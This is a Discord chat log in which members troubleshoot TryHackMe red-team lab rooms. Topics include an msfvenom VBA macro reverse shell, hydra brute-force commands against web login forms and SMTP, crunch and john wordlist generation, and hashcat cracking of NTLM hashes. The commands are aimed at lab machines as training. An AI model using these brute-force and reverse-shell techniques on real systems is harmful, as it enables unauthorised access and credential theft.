sort of, I believe browsers try to use an anonymous login silently.

or something like that.

Anyone run into the issue of the Weaponization - Visual Basic for Application where the document is closing when attempting to reverse shell?

When doing all the other listed steps it works for loading Calc, opening the popups, etc, but copying and pasting the VBA script from msfvenom it closes before a reverse shell can open

Did you catch that you needed to change one thing in the msfvenom output? Not sure that would cause closing behavior or not.

Yeah, I even tested both in Excel and Word, both just crash out

I thought it was just a bad script made a new macro and it still loads, then crashes

Only the msfvenom output is in the macro, yeah?

If so, you could maybe try to regenerate that, though I bet you already did.

yeah I even attempted it in attackbox instead of my kali VM and it still crashed

Already attempted both in Attackbox and my personal KaliVM

boo 🙂

beyond that maybe recheck ports and IP addresses, but, even a bad connection shouldn't close the doc.

I get a semi connection using nc -lvp 4444 and it connects but doesn't connect to meterpeter

you're in metasploit to upgrade to meterpreter, correct?

yeah

or rather catch it and do the dance that is. hmmm

it doesn't crash word when I use nc to listen but when I use MSFConsole after verifying a connection using NC and manually start the exploit it crashes word/excel

does it crash pretty quickly or does it take a few minutes?

It takes about 1-2 minutes before it crashes

but not enough to get a meterpreter through and do any commands?

nope, going to try the kali optomized to see if it is an issue as I recently updated my metasploit framework

but if it works in the kali instance on THM but not attackbox that is strange

I wish you luck, I have no other ideas. Mine worked pretty well with kali 2022.03 defaults. I think the only thing that deviated from the instructions would be after successful connection and doing a run post/windows/manage/migrate to keep it up.

@molten summithave you finished the active directory basics redteam room?

Looks to be an issue with MSF6

im stuck on https://tryhackme.com/room/winadbasics task 6 . i cant find the network share used to distribute GPOs to domain machines.
ive done all the gpo configuration and updated it and rdped like it asked. ive checked all over the gpo settings for it

It's in the task materials/text.

hmm well that's a bummer, but also nice to get an explanation.

also no idea why/how? but it still crashes word as well even with msf5 but I'm actually able to get a connection but not to meterpeter in msfconsole unlike before

i overcomplicated it @molten summit

It's all good, I bet you learned a bunch. 🙂

So I'm able to get a command shell session but after running any command it kills word 🙃

I had to respawn the machine to fix it, guessing it was a bad connection or something

Could help

?

Password attack task 9

what do you want to know

I need another hint for room Password Attacks, Task 4:
This is my solution, but it's wrong:
crunch 5 5 -t "THM@!" -o tryhackme.txt

There is a special characther you can use to generalize symbols

@winged isle

Exploiting Active Directory
Task 5 Exploiting AD Users

I recommend introducing some script that automatically picks up the process we need to migrate to.
Someone messed up that process and I can't go any further.
In the list of processes it does not exist, and this is the only process that allows you to perform the task, that is, to use the keylogger.

CANNOT COMPLETE TASK without resetting machine

thx that helped

Gave +1 Rep to @celest vessel

In the instructions we have written to take over the process C:Windows\explorer.exe, which is running with the permissions of THMSERVER1.local.
In the attached window, you can see that there is no process running as this user

Red Team Threat Intel Task 7:

Open the provided ATT&CK Navigator layer and identify matched TTPs to the cyber kill chain. Once TTPs are identified, map them to the cyber kill chain in the static site. To complete the challenge, you must submit one technique name per kill chain section.

a bit ambiguous, I can't really solved without checking the hint as a tried with other technique combinations and didn't work ... could someone explain bit further? Thanks in advance!

anyone else having this kinda error on the windows local presistence room???

it is asking you to choose the blue boxes from the navigator page and fill in the answers for the different steps... the correct answers when you click the submit answer button will have a grey line under them instead of a red line

Can anyone help me with the passwords attack room? task 8 and 9 are kicking my butt and i am having trouble creating a username list and getting the attack to actually work

Can you tell us where exactly you are stuck?

no one did! LOL - they want you to order the steps and give you the first two. then another scenario pops up. very confusing wording

oh sure.... you can use a wordlist for both passwords and usernames for task 9

and for task 8 it is kinda straight forward if you know how to use hydra.... and the first question on that is as simple as remembering that some people forget to disable a default account on ftp

if you need more specific answers then that you would need to provide some more info

Something doesn't add up in the Password Attacks room in task 4. The crunch answer input expects crunch 5 5 -t "7 chars" -o tryhackme.txt but the min-max values for the generated passwords in limited to 5

must say its confusing

2 of those chars are " i.e quotes..... so they don't really count

Quotes? where? generate a list containing THM@! i read it as THM[a-z]!

which is 5 chars, am i missing anything?

you surround the "thm@!" with quotes as what you are generating is going to include spaces and therefor be bleghg for terminal stuffs

also that was just an example the real answer uses only symbols and not the a-z thingy

if THM@! is just an example and the answer is only symbols, then the only thing i can come up with is crunch 5 5 -t ,,,^^ -o tryhackme.txt, which will give you three upper case chars and two symbols combination, but that also gives me a wrong answer.

also tried crunch 5 5 -t ",,,^^" and also "THM^^" not the right answers

any nudge to the right direction would be appreciated, i must be missing something simple here

HA! got it 🙂

The second one you did there should have been the right answer

yeah, i figured it out! thx 🙂

No problem

@royal void i got the first task just fine lol. It's mainly the other questions in task 8. i am confused on the hydra syntax, and having trouble brute forcing that login-get webpage

small hint: ||hydra -l phillips -P clinic.lst 10.10.48.200 http-get-form||

@warped lion ⬆️

if you missed the hint

Keep it up guys , if I get stuck in any room ,hopefully I'll find it here without asking : )

so i figured out the syntax and got that question, thanks

but when i try to brute force smtp, this is what i get: "[ERROR] SMTP LOGIN AUTH, either this auth is disabled or server is not using auth: 454 4.7.0 Temporary authentication failure: Connection lost to authentication server"

and this is my syntax: hydra -l pittman -P clinic.lst 10.10.30.14 smtp

and ive tried other ways besides that syntax and still get the same error. Has anyone ran into a similar issue?

@royal void Thank you

Gave +1 Rep to @royal void

the tickets are then rewarded... just check your tickets in the profile page and you will see what you got

you can get duplicates when you already have 3 of the same type

your command is slightly wrong... you need to include the full email address for that ones... i.e pittman@clinic.thmredteam.com

not that shadow knows... better luck in #1017019049181450291 probably.... maybe just maybe #site-bugs could also help

@royal void how did u go about generating the rule based dictionary for that pittman question?

ive been trying john and will generate like 8000 words but i cant get it to save/overwrite the wordlist

john blah blah wordlist and rule --stdout | tee newwordlistthingy

https://tenor.com/view/tired-struggle-gif-10628444

well you are getting there slowly but surely

it is also okay to take a break and come back later

lol, ive tried doing it but the file crashes and gets locked in john.rec

huh

!docs verify

can you follow the instructions in that link and post a screenshot of the error

if you run just john what does it tell you its version is???

1.9.0

nothing about jumbo???

1.9.0-jumbo-1+bleeding-51f7f3dcd

huh

weird then

just do a rm /opt/john/john.rec and try the command again... maybe

be careful with the rm command though

as it can and will sometimes delete files you need

if your path is wrong for example

Thanks for the advice

Gave +1 Rep to @royal void

oh no problem.... took you long enough to reply.... hope it made you solve the question

It helped a lot. now just working on the machine Task. doing the Intro to C2

@royal void is my syntax pretty on point?

yes except shadow defined the rule before the wordlist

but don't think that should affect it a lot

shadow, sometimes I wonder if you are some AI speaking for shadow herself 😄

hehe nah just using third person to refer to themselves like always

well thanks @royal void for oyur help, i guess ill just wait and see if anyone else can figure it out and try again a different time

Gave +1 Rep to @royal void

or we can do this @warped lion :

that is what it generated for shadow as the wordlist using the best64 rule

Can someone help with Lateral Movement and Pivoting? I've tried connecting through my own vm and the attackbox and cannot get access.

not done that yet so sadly shadow can't help

Trying to break the hashes but get this error Hash '/root/Desktop/Tools/wordlists/hashes.hash': Token length exception. This is the command I am running hashcat --force -a 0 -m 0 /root/Desktop/Tools/wordlists/hashes.hash /root/Desktop/Tools/wordlists/rockyou.txt -r /root/Desktop/combinator.rule

your hashes.hash files hash is incorrect as it is either missing something or has to much of something that should not be there

This is what's in the the hash file aad3b435b51404eeaad3b435b51404ee:c156d5d108721c5626a6a054d6e0943c
aad3b435b51404eeaad3b435b51404ee:7639497cca10a2ee9b87712e3384539d
aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0
aad3b435b51404eeaad3b435b51404ee:2e2618f266da8867e5664425c1309a5c

do I need the ::: at the end

yeah probably

tell me did we all can get all the prizes or who get first it's his?

Hashdump gave me the answer and I didn't even see it

all that is left is getting the flags

go for it

you can do it

some prices are in unlimited supply while some are first come first serve

better explained in the tickets room

i see then no point to go forward pineapple already taken

thanks

!docs verify

will the tickets no longer be useful if the voucher is already redeemed by someone

?

if all of the available prices of that catogery is gone shadow would assume so

😢 okay!

Hi,
I am at Performing an LDAP Pass-back & connected with my Kali VPN connected, while setup LDAP server, there's no selection on LDAP database (MDB) but it go next options ie "ensure the database is not removed when purged"
And I am unable to connect to LDAP server.

What could be the issue here?

Anyone want join to solve a room together ? Signature Evasion

hmmmm.......in Task 8 im running the brute force attack against the HTTP server and i get the User Pass pair from hydra, but when i use it in the login page in the browser i get login failed error

if I'm taking the -f switch, I'm getting the same 16 passwords for both users. I tried it with the custom list generated from the custom rule and the "clean" list, and both provide the same 16 passwords for both users. non of them work

what am i missing here?

16 user passwords correct means your syntax is wrong

hydra -l [user] -P [path to password list] 10.10.131.145 http-get "/login-get/index.php:username:^USER^&password=^PASS^:S=logout.php" -f

that is the syntax im using

Incorrect passwords show s=logout.php ?

how can you get 16 user passwords when you need to brute force only one account?

exactly

should it not be http-get-form instead of http-get

well, when you try the wrong creds you get Login Failed! message may using F=Login Failed! ?

i get 16 legit passwords, doesn't make sense

Hydra supports both http-form-get and http-get

I'm asking if that's you error message you get from a failed login attempt, that has to be correct also

im getting 16 successful user pass pairs from hydra but non works, not sure what im missing here 🙂

how can a user has 16 working passwords?

they dont, your syntax is likely wrong

ah yes, I also see the mistake in the synthax

any pointer on what part of the syntax?

have a look at where you specify username

When you command is wrong hydra shows that, it's a flawed error message, it happens to me too, like the other guy said cross-check what you wrote

i suspect S=logout.php is what's wrong here

but not sure

That's why i asked ,if that's the message for incorrect login attempts

google is also your friend, hydra can take a bunch of different things for success/failure

ahh i see!

Did you found it already @zealous wind ?

Someone help please, I can't complete this task it keeps loading for a very very long time 😪😪

Don't use the public ip, use the machineip:443

The website is broken

Sorry port 443

Got this message 😪

try typing : https://10.10.15.223

Https://

Thanks

oh yea i see the error too

We wanted to let him search for it :p

i also tired hardcoding the user instead of ^USER^ didnt work either. but i keep looking 🙂

if you setup proxychains you can make the request go to burp & inspect it to make sure it's doing exactly what you want

really handy for troubleshooting tools

Did you read what dix said?

ah he changed his comment 😄

you should not hardcode the ^USER^ part

it is something with username: which is not correct

ok

ill have another look

In the "Windows Privilege Escalation" room, the section about abusing SeBackup/SeRestore privileges is a little bit confusing (at least for me). It says that in order for the exploit to work the user must have the SeBackup/SeRestore privileges...then it shows a screenshot with a result of "whoami /priv" that clearly shows that the current user does NOT have these privileges...

I checked on the machine and despite the user THMBackup being part of the "Backup Operators" group, it does not have these privileges...but the exploit works anyway

is it something to do with the url parms maybe http://10.10.156.124/login-get/index.php?username=user&password=Password

This is the screenshot in the topic. "SeBackupPrivilege" and "SeRestorePrivilege" are both set to "Disabled"

what does it mean?

Ok, got it: if it's listed, the user has that privilege, the "State" column is relevant to the current process only

A little bit of explanation in the topic itself could be useful, in my opinion

will do. I agree, it's not a bug, just a little bit counterintuitive

so for the first user i got the following command: hydra -l phillips -P ./pass.txt 10.10.156.124 http-get-form "/login-get/index.php:username=^USER^&password=^PASS^:S=logout.php" -f which works, i got the right pass word.
for the 2nd user burgess u changes the method to http-post-form and the url to "/login-post/index.php" and using the custom list with the custom john rule which is Az"[0-9][0-9]"^[!@#$%^&*()/]

hydra comes up empty here 😤

should be the same other then changing the HTTP method and the uri

Hi! I've started this path and I'm having problems in the room https://tryhackme.com/room/redteamthreatintel with this question: "What signed binary did Carbanak use for defense evasion?"

I've used the ATTACK Navigator and I've also read the Kaspersky report about this APT but the answer I think is, it isn't. Someone could help me?

its a built-in windows binary used to execute code

Thanks for your help @zealous wind. As the ATTACK shows, I've only have one option with this hint but It isn't correct... I don't know if I can tell you my answer

Gave +1 Rep to @zealous wind

I've tried with .exe and without it

think of what windows binaries in C:\Windows\System32 you have that can be used to execute malicious code

I also saw that this APT injects code in another built-in binary, but this isn't the answer neither

Exactly, my two options are in the ATTACK and below this path

The answer is not in the carbank att&ck page

not in the software part anyways

Ok, good hint. I also read https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/03/08064518/Carbanak_APT_eng.pdf but I think doesn't have the answer anyway

Can I dm someone to explain me the crunch command task?😅

Why can't you do it here?

I just do not wanted to spam, I know that were already a lot of talks on this topic

the options are all symbols 😉

omit the -o to see how the output looks like that will also help you out

First of all I did not understand from the task, how the output should look like? Which characters should be in the final output and which are special characters

THM something something

Talking about a room task is not considered spam

I'm setting up armitage in my local machine using the instructions in "Intro to C2" module under section "Setting up a C2 framework"

Lastly, we must initialize the Database so that Metasploit can use it. It's important to note that you cannot be the root user when attempting to initialize the Metasploit Database. On the AttackBox, you must use the Ubuntu user.

This instruction is given in THM but I am unable to start msfdb as normal user as you can see above

What do I do?

Sudo msfdb init

If anyone can DM me about the last part of task 8 I'd appreciate it!

You should include what room you are evening talking about

Password attacks.....sorry about that

Doing that room right now, if I'm past task 8 and you haven't gotten an answer until then, I might be able to help

@zealous wind what problem are u facing for that task ?

so for the first user i got the following command: hydra -l phillips -P ./pass.txt 10.10.156.124 http-get-form "/login-get/index.php:username=^USER^&password=^PASS^:S=logout.php" -f which works, i got the right pass word.
for the 2nd user burgess u changes the method to http-post-form and the url to "/login-post/index.php" and using the custom list with the custom john rule which is Az"[0-9][0-9]"^[!@#$%^&*()/]

hydra comes back empty

task 8 last question is not using custom rule

u must use single-extra rule from john

sorry but i thought the custom rule == single-extra

what is single-extra rule then>

hm u can say its like a inbuilt wordlist of rules that we can use

so task 6 u learn on how to craft ur own rule

if u run the command to see all the rules, like this:

so when the hint tell me to use "John's Single-Extra Rule", i take it as use john in built rule, not the custom rule which i created.

i also have the habit to double press my tab key to see if i miss out anything and for auto completion, doing so i stumble upon the rules like this

first tab after typing "sin" to see if the rules is valid. If it autocomplete, means its valid.

double tap the tab button and it tells me that i have 2 option to use.